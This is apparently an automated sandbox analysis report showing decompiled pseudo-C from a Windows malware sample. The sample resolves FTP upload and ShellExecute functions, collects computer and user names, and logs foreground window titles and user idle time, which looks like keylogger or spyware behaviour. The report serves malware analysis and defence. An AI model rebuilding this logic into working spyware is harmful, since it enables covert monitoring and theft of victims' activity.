                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01307C26
                                                                                                                                      • GetComputerNameExW.KERNEL32(00000001,?,?), ref: 01307C48
                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 01307C60
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Name$ComputerH_prologUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 187630164-0
                                                                                                                                      • Opcode ID: bddafc6a32c7322df8e79321f07af6fc843b5d21e854dd69b093ef4af761a1e8
                                                                                                                                      • Instruction ID: cc4ac85e39fca10b4444483e4807979864cd582794fc9ccaa9374a7ab6c32433
                                                                                                                                      • Opcode Fuzzy Hash: bddafc6a32c7322df8e79321f07af6fc843b5d21e854dd69b093ef4af761a1e8
                                                                                                                                      • Instruction Fuzzy Hash: E30121B59042199FDB15FB94D959BEEBBBCFF18704F10405AE405A3180EBB46B49CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0130A026() {
                                                                                                                                      				_Unknown_base(*)()* _t1;
                                                                                                                                      
                                                                                                                                      				_t1 = SetUnhandledExceptionFilter(E0130A032); // executed
                                                                                                                                      				return _t1;
                                                                                                                                      			}




                                                                                                                                      0x0130a02b
                                                                                                                                      0x0130a031

                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_0000A032,01309CFD), ref: 0130A02B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: e9c1ba45c5452c3465e29b837098c407a84ecbff3ef8d1e6a6d17bc52c427d35
                                                                                                                                      • Instruction ID: 3fab3e622f612648b4c90b665e6405f6228016b143a65187ca6ae77ed42de868
                                                                                                                                      • Opcode Fuzzy Hash: e9c1ba45c5452c3465e29b837098c407a84ecbff3ef8d1e6a6d17bc52c427d35
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E01306EAD() {
                                                                                                                                      				_Unknown_base(*)()* _t2;
                                                                                                                                      				struct HINSTANCE__* _t3;
                                                                                                                                      				struct HINSTANCE__* _t9;
                                                                                                                                      				_Unknown_base(*)()* _t10;
                                                                                                                                      				struct HINSTANCE__* _t11;
                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                      				CHAR* _t21;
                                                                                                                                      				CHAR* _t22;
                                                                                                                                      
                                                                                                                                      				_t2 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                                                                                                                      				_t21 = "Shlwapi.dll";
                                                                                                                                      				 *0x132f8e0 = _t2; // executed
                                                                                                                                      				_t3 = LoadLibraryA(_t21); // executed
                                                                                                                                      				 *0x132f8dc = GetProcAddress(_t3, 0xc);
                                                                                                                                      				 *0x132f8f8 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                                                                                                                      				 *0x132f8d4 = GetProcAddress(LoadLibraryA(_t21), "PathFileExistsW"); // executed
                                                                                                                                      				_t9 = LoadLibraryA("shell32.dll"); // executed
                                                                                                                                      				_t10 = GetProcAddress(_t9, "ShellExecuteW");
                                                                                                                                      				_t22 = "wininet.dll";
                                                                                                                                      				 *0x132f8d8 = _t10;
                                                                                                                                      				_t11 = LoadLibraryA(_t22); // executed
                                                                                                                                      				 *0x132f8f4 = GetProcAddress(_t11, "FtpPutFileW");
                                                                                                                                      				 *0x132f8e8 = GetProcAddress(LoadLibraryA(_t22), "InternetOpenW");
                                                                                                                                      				 *0x132f8f0 = GetProcAddress(LoadLibraryA(_t22), "InternetConnectW");
                                                                                                                                      				 *0x132f8ec = GetProcAddress(LoadLibraryA(_t22), "FtpCreateDirectoryW");
                                                                                                                                      				_t20 = GetProcAddress(LoadLibraryA(_t22), "InternetCloseHandle");
                                                                                                                                      				 *0x132f8e4 = _t20;
                                                                                                                                      				return _t20;
                                                                                                                                      			}











                                                                                                                                      0x01306ec7
                                                                                                                                      0x01306ecf
                                                                                                                                      0x01306ed7
                                                                                                                                      0x01306edc
                                                                                                                                      0x01306eeb
                                                                                                                                      0x01306efb
                                                                                                                                      0x01306f0f
                                                                                                                                      0x01306f14
                                                                                                                                      0x01306f17
                                                                                                                                      0x01306f1e
                                                                                                                                      0x01306f23
                                                                                                                                      0x01306f29
                                                                                                                                      0x01306f34
                                                                                                                                      0x01306f44
                                                                                                                                      0x01306f54
                                                                                                                                      0x01306f64
                                                                                                                                      0x01306f6c
                                                                                                                                      0x01306f70
                                                                                                                                      0x01306f76

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,013057F9), ref: 01306EBA
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306EC7
                                                                                                                                      • LoadLibraryA.KERNELBASE(Shlwapi.dll,0000000C,?,?,?,013057F9), ref: 01306EDC
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306EDF
                                                                                                                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo,?,?,?,013057F9), ref: 01306EF0
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306EF3
                                                                                                                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,PathFileExistsW,?,?,?,013057F9), ref: 01306F00
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306F03
                                                                                                                                      • LoadLibraryA.KERNELBASE(shell32.dll,ShellExecuteW,?,?,?,013057F9), ref: 01306F14
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306F17
                                                                                                                                      • LoadLibraryA.KERNELBASE(wininet.dll,FtpPutFileW,?,?,?,013057F9), ref: 01306F29
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306F2C
                                                                                                                                      • LoadLibraryA.KERNEL32(wininet.dll,InternetOpenW,?,?,?,013057F9), ref: 01306F39
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306F3C
                                                                                                                                      • LoadLibraryA.KERNEL32(wininet.dll,InternetConnectW,?,?,?,013057F9), ref: 01306F49
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306F4C
                                                                                                                                      • LoadLibraryA.KERNEL32(wininet.dll,FtpCreateDirectoryW,?,?,?,013057F9), ref: 01306F59
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306F5C
                                                                                                                                      • LoadLibraryA.KERNEL32(wininet.dll,InternetCloseHandle,?,?,?,013057F9), ref: 01306F69
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01306F6C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                      • String ID: FtpCreateDirectoryW$FtpPutFileW$GetLastInputInfo$GetMonitorInfoW$InternetCloseHandle$InternetConnectW$InternetOpenW$PathFileExistsW$ShellExecuteW$Shlwapi.dll$User32.dll$shell32.dll$user32$wininet.dll
                                                                                                                                      • API String ID: 4236061018-2278170924
                                                                                                                                      • Opcode ID: c5ea5bcc374197f7ec6e00fa869881e1c0995f3c6a792e7a6651db0ec495e2b9
                                                                                                                                      • Instruction ID: 9e8dbace61393a20fda6e341140d8b343a02cebe0144dd027c9cb78f7c0679ff
                                                                                                                                      • Opcode Fuzzy Hash: c5ea5bcc374197f7ec6e00fa869881e1c0995f3c6a792e7a6651db0ec495e2b9
                                                                                                                                      • Instruction Fuzzy Hash: B51147B1D40378AACA307FB76D4DC0BBEACEB84759751481EF544D3605DAB89440DFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                      			E01301B05(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				intOrPtr _t45;
                                                                                                                                      				struct HWND__* _t46;
                                                                                                                                      				int _t47;
                                                                                                                                      				signed int _t52;
                                                                                                                                      				void* _t58;
                                                                                                                                      				void* _t59;
                                                                                                                                      				void* _t60;
                                                                                                                                      				int _t67;
                                                                                                                                      				void* _t76;
                                                                                                                                      				void* _t77;
                                                                                                                                      				struct HWND__* _t89;
                                                                                                                                      				signed int _t90;
                                                                                                                                      				void* _t91;
                                                                                                                                      				intOrPtr _t93;
                                                                                                                                      				void* _t124;
                                                                                                                                      				void* _t130;
                                                                                                                                      				void* _t132;
                                                                                                                                      				intOrPtr* _t134;
                                                                                                                                      				char** _t136;
                                                                                                                                      
                                                                                                                                      				_t117 = __edx;
                                                                                                                                      				_t91 = __ecx;
                                                                                                                                      				E01323174(E01323260, __edx, __eflags);
                                                                                                                                      				_t134 = _t132 - 0x5c;
                                                                                                                                      				_t124 = _t91;
                                                                                                                                      				if( *((char*)(_t124 + 0x50)) == 0) {
                                                                                                                                      					L21:
                                                                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t130 - 0xc));
                                                                                                                                      					__eflags = _t130 + 0x78;
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					_t93 =  *((intOrPtr*)( *[fs:0x2c]));
                                                                                                                                      					 *((intOrPtr*)(_t130 + 0x6c)) = _t93;
                                                                                                                                      					while(1) {
                                                                                                                                      						_t45 =  *0x132fad8; // 0x80000001
                                                                                                                                      						if(_t45 >  *((intOrPtr*)(_t93 + 4))) {
                                                                                                                                      							E01309873(_t45, 0x132fad8);
                                                                                                                                      							_t140 =  *0x132fad8 - 0xffffffff;
                                                                                                                                      							if( *0x132fad8 == 0xffffffff) {
                                                                                                                                      								E01302801(0x132fadc);
                                                                                                                                      								E01309BFF(_t140, E01323955);
                                                                                                                                      								 *_t134 = 0x132fad8;
                                                                                                                                      								E01309829();
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						Sleep(0x1f4); // executed
                                                                                                                                      						_t46 = GetForegroundWindow(); // executed
                                                                                                                                      						_t89 = _t46;
                                                                                                                                      						_t47 = GetWindowTextLengthW(_t89);
                                                                                                                                      						_t4 = _t47 + 1; // 0x1
                                                                                                                                      						_t95 = _t130 + 0x54;
                                                                                                                                      						E013027BD(_t130 + 0x54, _t4, 0);
                                                                                                                                      						 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
                                                                                                                                      						_t141 = _t47;
                                                                                                                                      						if(_t47 != 0) {
                                                                                                                                      							_t67 = E01302709();
                                                                                                                                      							GetWindowTextW(_t89, E01302712(_t130 + 0x54, _t141), _t67);
                                                                                                                                      							_t117 = 0x132fadc;
                                                                                                                                      							_t95 = _t130 + 0x54;
                                                                                                                                      							if(E0130330C(0x132fadc) == 0) {
                                                                                                                                      								E01302728(0x132fadc, _t130 + 0x54);
                                                                                                                                      								_push(0x132fadc);
                                                                                                                                      								E013026E8(_t130 + 0x54, _t124, _t128, E01302709() - 1);
                                                                                                                                      								_t143 =  *0x132f9b1;
                                                                                                                                      								_t76 = _t130 + 0x54;
                                                                                                                                      								if( *0x132f9b1 == 0) {
                                                                                                                                      									_push(_t76);
                                                                                                                                      									_t77 = E01303294(_t130 + 0x30, L"\r\n[", __eflags);
                                                                                                                                      									_t134 = _t134 - 0x14;
                                                                                                                                      									 *(_t130 - 4) = 1;
                                                                                                                                      									_t117 = _t77;
                                                                                                                                      									E013031AE(_t134, _t77, _t124, L"]\r\n");
                                                                                                                                      									E013017EF(_t124, _t77, _t124, _t128, __eflags);
                                                                                                                                      									_t95 = _t130 + 0x30;
                                                                                                                                      									 *(_t130 - 4) = 0;
                                                                                                                                      									E01302755(_t130 + 0x30, _t77, __eflags);
                                                                                                                                      								} else {
                                                                                                                                      									_t134 = _t134 - 0x18;
                                                                                                                                      									E01302814(_t134, 0x132fadc, _t143, _t76);
                                                                                                                                      									_t95 = _t124;
                                                                                                                                      									E01301DA8(_t124, 0x132fadc, _t143);
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						_t144 =  *((intOrPtr*)(_t124 + 0x4c));
                                                                                                                                      						if( *((intOrPtr*)(_t124 + 0x4c)) != 0) {
                                                                                                                                      							_t95 = _t124;
                                                                                                                                      							E013023CA(_t124, _t117, _t144);
                                                                                                                                      						}
                                                                                                                                      						if(E01307D17(_t95) < 0xea60) {
                                                                                                                                      							L18:
                                                                                                                                      							 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
                                                                                                                                      							E01302755(_t130 + 0x54, _t117, __eflags);
                                                                                                                                      							__eflags =  *((char*)(_t124 + 0x50));
                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                      								goto L21;
                                                                                                                                      							}
                                                                                                                                      							_t93 =  *((intOrPtr*)(_t130 + 0x6c));
                                                                                                                                      							continue;
                                                                                                                                      						} else {
                                                                                                                                      							_t90 =  *(_t130 + 0x70);
                                                                                                                                      							while( *((char*)(_t124 + 0x50)) != 0) {
                                                                                                                                      								_t52 = E01307D17(_t95);
                                                                                                                                      								if(_t52 < 0xea60) {
                                                                                                                                      									__eflags = _t90 % 0xea60;
                                                                                                                                      									E01313AB8(_t95, _t90 / 0xea60, _t130 + 0x48, 0xa);
                                                                                                                                      									_t136 = _t134 + 0xc;
                                                                                                                                      									_t58 = E01302917(_t130 - 0x24, _t90 % 0xea60, _t130 + 0x48);
                                                                                                                                      									 *(_t130 - 4) = 2;
                                                                                                                                      									_t59 = E01303244(_t130, "\r\n{User was idle for ", _t58);
                                                                                                                                      									 *(_t130 - 4) = 3;
                                                                                                                                      									 *_t136 = " minutes}\r\n";
                                                                                                                                      									_t60 = E01303313(_t130 + 0x18, _t59);
                                                                                                                                      									_t134 = _t136 - 0x14;
                                                                                                                                      									 *(_t130 - 4) = 4;
                                                                                                                                      									_t117 = _t60;
                                                                                                                                      									E0130757A(_t134, _t60, __eflags);
                                                                                                                                      									E013017EF(_t124, _t60, _t124, 0xea60, __eflags);
                                                                                                                                      									E013028AF(_t130 + 0x18, _t60, __eflags);
                                                                                                                                      									E013028AF(_t130, _t60, __eflags);
                                                                                                                                      									E013028AF(_t130 - 0x24, _t117, __eflags);
                                                                                                                                      									goto L18;
                                                                                                                                      								}
                                                                                                                                      								_t90 = _t52;
                                                                                                                                      								 *(_t130 + 0x70) = _t90;
                                                                                                                                      								Sleep(0x3e8);
                                                                                                                                      							}
                                                                                                                                      							E01302755(_t130 + 0x54, _t117, __eflags);
                                                                                                                                      							goto L21;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}

























                                                                                                                                      0x01301b05
                                                                                                                                      0x01301b05
                                                                                                                                      0x01301b0e
                                                                                                                                      0x01301b13
                                                                                                                                      0x01301b19
                                                                                                                                      0x01301b1f
                                                                                                                                      0x01301d24
                                                                                                                                      0x01301d2b
                                                                                                                                      0x01301d33
                                                                                                                                      0x01301d37
                                                                                                                                      0x01301b25
                                                                                                                                      0x01301b2b
                                                                                                                                      0x01301b2d
                                                                                                                                      0x01301b30
                                                                                                                                      0x01301b30
                                                                                                                                      0x01301b3b
                                                                                                                                      0x01301b42
                                                                                                                                      0x01301b47
                                                                                                                                      0x01301b4f
                                                                                                                                      0x01301b56
                                                                                                                                      0x01301b60
                                                                                                                                      0x01301b65
                                                                                                                                      0x01301b6c
                                                                                                                                      0x01301b71
                                                                                                                                      0x01301b4f
                                                                                                                                      0x01301b77
                                                                                                                                      0x01301b7d
                                                                                                                                      0x01301b83
                                                                                                                                      0x01301b86
                                                                                                                                      0x01301b90
                                                                                                                                      0x01301b94
                                                                                                                                      0x01301b97
                                                                                                                                      0x01301b9c
                                                                                                                                      0x01301ba0
                                                                                                                                      0x01301ba2
                                                                                                                                      0x01301bab
                                                                                                                                      0x01301bb8
                                                                                                                                      0x01301bbe
                                                                                                                                      0x01301bc3
                                                                                                                                      0x01301bcd
                                                                                                                                      0x01301bd8
                                                                                                                                      0x01301bdd
                                                                                                                                      0x01301be8
                                                                                                                                      0x01301bed
                                                                                                                                      0x01301bf4
                                                                                                                                      0x01301bf7
                                                                                                                                      0x01301c0d
                                                                                                                                      0x01301c16
                                                                                                                                      0x01301c1b
                                                                                                                                      0x01301c1e
                                                                                                                                      0x01301c24
                                                                                                                                      0x01301c2b
                                                                                                                                      0x01301c33
                                                                                                                                      0x01301c38
                                                                                                                                      0x01301c3b
                                                                                                                                      0x01301c3f
                                                                                                                                      0x01301bf9
                                                                                                                                      0x01301bf9
                                                                                                                                      0x01301bff
                                                                                                                                      0x01301c04
                                                                                                                                      0x01301c06
                                                                                                                                      0x01301c06
                                                                                                                                      0x01301bf7
                                                                                                                                      0x01301bcd
                                                                                                                                      0x01301c44
                                                                                                                                      0x01301c48
                                                                                                                                      0x01301c4a
                                                                                                                                      0x01301c4c
                                                                                                                                      0x01301c4c
                                                                                                                                      0x01301c5d
                                                                                                                                      0x01301d02
                                                                                                                                      0x01301d02
                                                                                                                                      0x01301d09
                                                                                                                                      0x01301d0e
                                                                                                                                      0x01301d12
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01301d14
                                                                                                                                      0x00000000
                                                                                                                                      0x01301c63
                                                                                                                                      0x01301c63
                                                                                                                                      0x01301c66
                                                                                                                                      0x01301c70
                                                                                                                                      0x01301c77
                                                                                                                                      0x01301c95
                                                                                                                                      0x01301c98
                                                                                                                                      0x01301c9d
                                                                                                                                      0x01301ca7
                                                                                                                                      0x01301cb2
                                                                                                                                      0x01301cb9
                                                                                                                                      0x01301cbe
                                                                                                                                      0x01301cc7
                                                                                                                                      0x01301cce
                                                                                                                                      0x01301cd3
                                                                                                                                      0x01301cd6
                                                                                                                                      0x01301cda
                                                                                                                                      0x01301cde
                                                                                                                                      0x01301ce5
                                                                                                                                      0x01301ced
                                                                                                                                      0x01301cf5
                                                                                                                                      0x01301cfd
                                                                                                                                      0x00000000
                                                                                                                                      0x01301cfd
                                                                                                                                      0x01301c79
                                                                                                                                      0x01301c80
                                                                                                                                      0x01301c83
                                                                                                                                      0x01301c83
                                                                                                                                      0x01301d1f
                                                                                                                                      0x00000000
                                                                                                                                      0x01301d1f
                                                                                                                                      0x01301c5d
                                                                                                                                      0x01301b30

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01301B0E
                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 01301B6C
                                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 01301B77
                                                                                                                                      • GetForegroundWindow.USER32 ref: 01301B7D
                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 01301B86
                                                                                                                                      • GetWindowTextW.USER32 ref: 01301BB8
                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 01301C83
                                                                                                                                        • Part of subcall function 01309873: EnterCriticalSection.KERNEL32(0132EAA8,?,0000EA60,?,01301B47,0132FAD8,00000001,00000000), ref: 0130987E
                                                                                                                                        • Part of subcall function 01309873: LeaveCriticalSection.KERNEL32(0132EAA8,?,0000EA60,?,01301B47,0132FAD8,00000001,00000000), ref: 013098BB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$CriticalSectionSleepText$EnterForegroundH_prologInit_thread_footerLeaveLength
                                                                                                                                      • String ID: [${User was idle for $ minutes}$]
                                                                                                                                      • API String ID: 3516977823-2478999669
                                                                                                                                      • Opcode ID: 493c09622a3371e439d2609d86a64a80362f4385669827416d5c82b940333689
                                                                                                                                      • Instruction ID: 3dcb9fd84916d266288102ef9774e15f693cb6f179c865c6e8a856a75ece7c75
                                                                                                                                      • Opcode Fuzzy Hash: 493c09622a3371e439d2609d86a64a80362f4385669827416d5c82b940333689
                                                                                                                                      • Instruction Fuzzy Hash: A65193706002559BEB1AFF6CC9A9BAE7BE9AF6471CF504058E802876C1DF34DE09C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                      			E01307692(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				signed int _t54;
                                                                                                                                      				void* _t57;
                                                                                                                                      				void* _t58;
                                                                                                                                      				void* _t60;
                                                                                                                                      				intOrPtr _t75;
                                                                                                                                      				void* _t93;
                                                                                                                                      				void* _t102;
                                                                                                                                      
                                                                                                                                      				_t93 = __edx;
                                                                                                                                      				_t75 = __ecx;
                                                                                                                                      				E01323174(E0132384D, __edx, __eflags);
                                                                                                                                      				 *((intOrPtr*)(_t102 - 0x10)) = _t75;
                                                                                                                                      				E01302801(_t102 - 0x28);
                                                                                                                                      				 *(_t102 - 4) =  *(_t102 - 4) & 0x00000000;
                                                                                                                                      				_t54 = _t93 + 0xffffffd0;
                                                                                                                                      				_t108 = _t54 - 7;
                                                                                                                                      				if(_t54 <= 7) {
                                                                                                                                      					switch( *((intOrPtr*)(_t54 * 4 +  &M01307896))) {
                                                                                                                                      						case 0:
                                                                                                                                      							_push(L"Temp");
                                                                                                                                      							goto L14;
                                                                                                                                      						case 1:
                                                                                                                                      							__ecx = __ebp - 0x40;
                                                                                                                                      							__eax = E01307A87(__ebp - 0x40, __edx, __eflags);
                                                                                                                                      							__ecx = __ebp - 0x28;
                                                                                                                                      							__eax = E0130275A(__ebp - 0x28, __edx, __eax);
                                                                                                                                      							goto L4;
                                                                                                                                      						case 2:
                                                                                                                                      							_push(L"SystemDrive");
                                                                                                                                      							goto L14;
                                                                                                                                      						case 3:
                                                                                                                                      							_push(L"WinDir");
                                                                                                                                      							goto L14;
                                                                                                                                      						case 4:
                                                                                                                                      							__eax = E01307AF1(__ecx);
                                                                                                                                      							__eflags = __al;
                                                                                                                                      							if(__al != 0) {
                                                                                                                                      								__ecx = __ebp - 0x40;
                                                                                                                                      								__esi = E013027E1(__ecx, __edx, L"\\SysWOW64");
                                                                                                                                      								 *((char*)(__ebp - 4)) = 3;
                                                                                                                                      								__eax = E01311D74(__ebx, __ecx, __edi, L"WinDir");
                                                                                                                                      								__ecx = __ebp - 0x58;
                                                                                                                                      								__edx = __eax;
                                                                                                                                      								 *((char*)(__ebp - 4)) = 4;
                                                                                                                                      								__ecx = __ebp - 0x70;
                                                                                                                                      								__eax = E0130333B(__edx, __esi);
                                                                                                                                      								__ecx = __ebp - 0x28;
                                                                                                                                      								__eax = E0130275A(__ebp - 0x28, __edx, __eax);
                                                                                                                                      								__ecx = __ebp - 0x70;
                                                                                                                                      								__eax = E01302755(__ebp - 0x70, __edx, __eflags);
                                                                                                                                      								__ecx = __ebp - 0x58;
                                                                                                                                      								__eax = E01302755(__ebp - 0x58, __edx, __eflags);
                                                                                                                                      								 *((char*)(__ebp - 4)) = 0;
                                                                                                                                      								L4:
                                                                                                                                      								__ecx = __ebp - 0x40;
                                                                                                                                      								goto L5;
                                                                                                                                      							} else {
                                                                                                                                      								__ecx = __ebp - 0x70;
                                                                                                                                      								__esi = E013027E1(__ecx, __edx, L"\\system32");
                                                                                                                                      								 *((char*)(__ebp - 4)) = 1;
                                                                                                                                      								__eax = E01311D74(__ebx, __ecx, __edi, L"WinDir");
                                                                                                                                      								__ecx = __ebp - 0x58;
                                                                                                                                      								__edx = __eax;
                                                                                                                                      								 *((char*)(__ebp - 4)) = 2;
                                                                                                                                      								__ecx = __ebp - 0x40;
                                                                                                                                      								__eax = E0130333B(__edx, __esi);
                                                                                                                                      								__ecx = __ebp - 0x28;
                                                                                                                                      								__eax = E0130275A(__ebp - 0x28, __edx, __eax);
                                                                                                                                      								__ecx = __ebp - 0x40;
                                                                                                                                      								__eax = E01302755(__ebp - 0x40, __edx, __eflags);
                                                                                                                                      								__ecx = __ebp - 0x58;
                                                                                                                                      								__eax = E01302755(__ebp - 0x58, __edx, __eflags);
                                                                                                                                      								 *((char*)(__ebp - 4)) = 0;
                                                                                                                                      								__ecx = __ebp - 0x70;
                                                                                                                                      								L5:
                                                                                                                                      								__eax = E01302755(__ecx, __edx, __eflags);
                                                                                                                                      								goto L15;
                                                                                                                                      							}
                                                                                                                                      							L16:
                                                                                                                                      						case 5:
                                                                                                                                      							_push(L"ProgramFiles");
                                                                                                                                      							goto L14;
                                                                                                                                      						case 6:
                                                                                                                                      							_push(L"AppData");
                                                                                                                                      							goto L14;
                                                                                                                                      						case 7:
                                                                                                                                      							_push(L"UserProfile"); // executed
                                                                                                                                      							L14:
                                                                                                                                      							_t69 = E01311D74(_t72, _t76, _t96); // executed
                                                                                                                                      							E01302723(_t102 - 0x28, _t69);
                                                                                                                                      							goto L15;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				L15:
                                                                                                                                      				__imp__GetLongPathNameW(E01302712(_t102 - 0x28, _t108), _t102 - 0x290, 0x208); // executed
                                                                                                                                      				_t57 = E013027E1(_t102 - 0x88, _t93,  *((intOrPtr*)(_t102 + 8)));
                                                                                                                                      				 *(_t102 - 4) = 5;
                                                                                                                                      				_t58 = E013027E1(_t102 - 0x40, _t93, 0x1329c08);
                                                                                                                                      				 *(_t102 - 4) = 6;
                                                                                                                                      				_t60 = E01308145(_t102 - 0x58, _t102 - 0x290, _t56);
                                                                                                                                      				 *(_t102 - 4) = 7;
                                                                                                                                      				_t95 = E0130333B(_t60, _t58);
                                                                                                                                      				 *(_t102 - 4) = 8;
                                                                                                                                      				E0130333B(_t61, _t57);
                                                                                                                                      				E01302755(_t102 - 0x70, _t61, _t108);
                                                                                                                                      				E01302755(_t102 - 0x58, _t95, _t108);
                                                                                                                                      				E01302755(_t102 - 0x40, _t95, _t108);
                                                                                                                                      				E01302755(_t102 - 0x88, _t95, _t108);
                                                                                                                                      				E01302755(_t102 - 0x28, _t95, _t108);
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t102 - 0xc));
                                                                                                                                      				return  *((intOrPtr*)(_t102 - 0x10));
                                                                                                                                      				goto L16;
                                                                                                                                      			}










                                                                                                                                      0x01307692
                                                                                                                                      0x01307692
                                                                                                                                      0x01307697
                                                                                                                                      0x013076a4
                                                                                                                                      0x013076ad
                                                                                                                                      0x013076b2
                                                                                                                                      0x013076b9
                                                                                                                                      0x013076bc
                                                                                                                                      0x013076bf
                                                                                                                                      0x013076c5
                                                                                                                                      0x00000000
                                                                                                                                      0x013076cc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
